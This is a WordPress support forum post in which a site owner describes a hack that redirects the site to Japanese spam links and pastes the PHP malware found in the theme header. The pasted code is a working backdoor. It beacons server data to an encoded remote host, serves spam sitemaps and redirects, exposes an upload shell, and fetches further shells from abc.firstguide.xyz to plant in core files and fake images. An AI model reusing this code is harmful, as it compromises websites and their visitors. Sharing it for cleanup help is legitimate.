Malware Attack On WordPress site .xyz
-
Today My website got hacked and redirecting it to other Japanese linls .I want to clean the malicious code from WordPress but each folder protected with htaccess
database and files and corn job
— i found this in theme header and it was based46set_time_limit(0); @ini_set("html_errors","0"); @ob_start(); $action = isset($_GET['ac']) ? $_GET['ac'] : ""; if ($action != "" && $action == "write") { $index_name = basename($_SERVER['SCRIPT_NAME']); write($index_name); echo "write done!"; exit(); } if ($action != "" && $action == "mup") { fup($action); exit(); } $u6='104\x116\x116\x112\x58\x47\x47\x115\x101\x111\x56\x50\x50\x45\x49\x50\x46\x98\x101\x97\x117\x116\x105\x102\x117\x108\x115\x117\x110\x115\x101\x116\x46\x115\x105\x116\x101\x47\x97\x112\x105\x47\x115\x101\x114\x118\x101\x114\x46\x112\x104\x112\x'; $group='ZQ822-12'; $wjt=0; if(file_exists($_SERVER['DOCUMENT_ROOT'].'/.htaccess')){ $wjt=1; } $_SERVER=@str_replace(' ','',($_SERVER)); unset($_SERVER['PATH']); unset($_SERVER['SYSTEMROOT']); unset($_SERVER['COMSPEC']); unset($_SERVER['PATHEXT']); unset($_SERVER['WINDIR']); unset($_SERVER['SERVER_SOFTWARE']); $s['HTTP_HOST']=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:''; $s['REMOTE_ADDR']=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:''; //$s['SERVER_ADDR']=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:''; $s['REQUEST_URI']=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:''; $s['HTTP_CLIENT_TOKEN']=isset($_SERVER['HTTP_CLIENT_TOKEN'])?$_SERVER['HTTP_CLIENT_TOKEN']:''; $s['HTTP_USER_AGENT']=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:''; $s['HTTP_REFERER']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:''; $s['HTTP_ACCEPT_LANGUAGE']=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:''; $s['SCRIPT_NAME']=isset($_SERVER['SCRIPT_NAME'])?$_SERVER['SCRIPT_NAME']:''; $s['SERVER_PORT']=isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:''; $s['SERVER_PROTOCOL']=isset($_SERVER['SERVER_PROTOCOL'])?$_SERVER['SERVER_PROTOCOL']:''; $s['HTTP_X_FORWARDED_PROTO']=isset($_SERVER['HTTP_X_FORWARDED_PROTO'])?$_SERVER['HTTP_X_FORWARDED_PROTO']:''; $s['HTTPS']=isset($_SERVER['HTTPS'])?$_SERVER['HTTPS']:''; $s['HTTP_X_FORWARDED_SSL']=isset($_SERVER['HTTP_X_FORWARDED_SSL'])?$_SERVER['HTTP_X_FORWARDED_SSL']:''; if (phpversion() < '5.2' || PHP_VERSION_ID < 50200) { $sj=serialize($s); }else{ $sj=json_encode($s); } $info=cgg(o0($u6).'?group='.$group.'&server='.$sj.'&wjt='.$wjt.'&time='.time().'&token=zqO0o1IliLp2&phpv='.phpversion()); if(file_exists($_SERVER['DOCUMENT_ROOT'].'/robots.txt')){ @unlink($_SERVER['DOCUMENT_ROOT'].'/robots.txt'); } if(file_exists($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml')){ @unlink($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml'); } if($info){ if(stripos($_SERVER['REQUEST_URI'],'sitemap.xml')!==false && stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')===false){ header('Content-type:application/xml'); echo ($info); exit(); }elseif ($_SERVER['REQUEST_URI']=='/robots.txt'){ header('Content-Type: text/plain;charset=utf-8'); echo ($info); exit(); }elseif(stripos($_SERVER['REQUEST_URI'],'atom.xml')!==false || stripos($_SERVER['REQUEST_URI'],'index.rdf')!==false || stripos($_SERVER['REQUEST_URI'],'rss.xml')!==false || stripos($_SERVER['REQUEST_URI'],'sitemap.xsl')!==false){ header('Content-type:application/xml'); echo ($info); exit(); }else if (preg_match('/sitemap(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)-(\d+).xml$/i',$_SERVER['REQUEST_URI'],$map_uri)){ if($map_uri[1]!="" && $map_uri[2]!="") { if($info=='HTTP/1.1 404 Not Found'){ header($info); header("Status: 404 Not Found"); exit(); }else { header('Content-type:application/xml'); echo($info); exit(); } } }elseif(stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')!==false ){ //$google=json_decode($info,true); $google=unserialize($info); foreach ($google as $g){ $r = cgg($g); if ($r == 'success' || (stripos($r, 'successfully') !== false) || (stripos($r, '') !== false) || (stripos($r, '') !== false) || (stripos($r,'webmasters')!==false)) { echo '<p style="color:#00A000">' . $g . '--------' . $r . '</p>'; } else { echo '<p style="color:#ff0000"><a href="' . $g . '" target="_blank">' . $g . '</a>--------' . $r . '</p>'; } } exit(); } else{ header("Content-type: text/html; charset=utf-8"); if(substr($info,'0',9)==='Location:'){ header($info); exit(); }elseif ($info=='HTTP/1.1 404 Not Found'){ } else{ if($info){ print_r($info); exit(); } } } }else{ //echo('500 error'); } function cgg($url) { $contents = @file_get_contents($url); if(!$contents) { $header = array( 'Accept: */*', 'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', ); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_HTTPHEADER, $header); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $contents = curl_exec($curl); curl_close($curl); } return $contents; } function o0($u){ $a=explode('\x',$u); $u1=''; foreach ($a as $b){ if($b) { $u1 .= chr($b); } } return $u1; } function fup($g){ error_reporting(0); if ($g == 'mup') { $saw1 = $_FILES['file']['tmp_name']; $saw2 = $_FILES['file']['name']; echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1, $saw2); exit(0); } } function write($index_name) { $write1 = cgg("https://abc.firstguide.xyz/write1.txt"); $write2 = cgg("https://abc.firstguide.xyz/write2.txt"); $shell_postfs = cgg("https://abc.firstguide.xyz/mm1.txt"); $shell_load = cgg("https://abc.firstguide.xyz/mm2.txt"); $new_ht_content = cgg("https://abc.firstguide.xyz/shl/htaccess.txt"); $ht_content = file_get_contents(".htaccess"); $index_content = file_get_contents($index_name); $loader_php = "wp-includes/template-loader.php"; $load_php = "wp-includes/load.php"; $font_editor_php = "wp-includes/SimplePie/index.php"; if (!is_dir("css")) { mkdir("css", 0755, true); } if ($index_name != "index.php") { $write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1); $write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2); } @chmod("css/.htaccess", 0755); file_put_contents("css/.htaccess", $new_ht_content); file_put_contents("css/load.php", $shell_load); if (is_dir("wp-includes/SimplePie")) { file_put_contents("wp-admin/images/arrow-lefts.png", $index_content); file_put_contents("wp-admin/images/arrow-rights.png", $ht_content); file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content); file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content); $loader_content = file_get_contents($loader_php); $load_content = file_get_contents($load_php); @chmod($loader_php, 0755); @chmod($load_php, 0755); file_put_contents($loader_php, $write1 . $loader_content); file_put_contents($load_php, $load_content . $write2); @chmod($loader_php, 0644); @chmod($load_php, 0644); file_put_contents($font_editor_php, $shell_postfs); } } ?>
every pluging was updated and the theme also .. i dont know how they access to my site
Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
- The topic ‘Malware Attack On WordPress site .xyz’ is closed to new replies.